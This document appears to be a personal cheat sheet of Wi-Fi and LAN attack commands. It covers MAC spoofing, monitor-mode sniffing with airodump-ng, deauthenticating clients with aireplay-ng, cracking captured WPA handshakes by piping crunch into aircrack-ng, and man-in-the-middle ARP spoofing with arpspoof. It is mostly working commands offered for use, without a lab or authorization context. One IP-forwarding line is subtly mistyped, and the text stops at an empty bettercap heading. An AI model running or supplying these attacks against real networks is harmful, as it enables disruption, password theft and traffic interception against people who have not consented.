WIFI
display all network interfaces
ifconfig
display all wireless network interfaces
iwconfig
turn on/off a specific network interface
ifconfig wlan0 down
ifconfig wlan0 up
change mac address
Warning: the network interface must be down to change the mac address.
Warning: the network interface will recover it's original mac address when the OS will be rebooted because it's only changed in memory.
Warning: you can find the mac address of a network interface in the "ether" section of the report generated by ifconfig.
ifconfig wlan0 hw ether 00:11:22:33:44:55
change wireless interface in mode monitor
iwconfig wlan0 mode monitor
sniffing on 5ghz wireless networks
airodump-ng --band a wlan0
sniffing on 2.4 and 5ghz wireless networks
airodump-ng --band abg wlan0
sniffing on a specific bssid and channel and write the output in a file
airodump-ng --bssid <enter bssid> --channel <channel number> --write <name of the test> wlan0
deauthentication
Warning: the higher the number of packets to send is, the longer the client will be disconnected. In case you just want to capture the handshake a value of 4 or 5 is sufficiant.
aireplay-ng --deauth <number of packets to send> -a <bssid> -c <client to disconnect mac> wlan0
crunch combined with aircrack-ng
crunch 8 8 01 | aircrack-ng test-01.cap -e F-7FF6A5 -w-
- 8 8 : 8 chars min and max, only tests 0 and 1 possibilities
- test-01.cap : name of the file containing the handshake
- -e F-7FF6A5 : name of the wifi network
- -w- : without wordlist
crunch
more realistic example using the charset feature of crunsh and limiting repetitions for lowercase, upercase, numbers and signs to a maximum of 2 repetitions.
crunch 6 12 charset.lst mixalpha-numeric-symbol14-space -d 2@ -d 2, -d 3% -d 2^| aircrack-ng test-01.cap -e <name of the wifi network> -w-
ARP SPOOFING
With arpspoof
192.168.0.1 = target
192.168.0.254 = router
execute simultaneously
arpspoof -i eth0 -t 192.168.0.1 192.168.0.254
arpspoof -i eth0 -t 192.168.0.254 192.168.0.1
then enable port forwarding on your local machine (to act like a router)
echo 1> /proc/sys/net/ipv4/ip_forward
with bettercap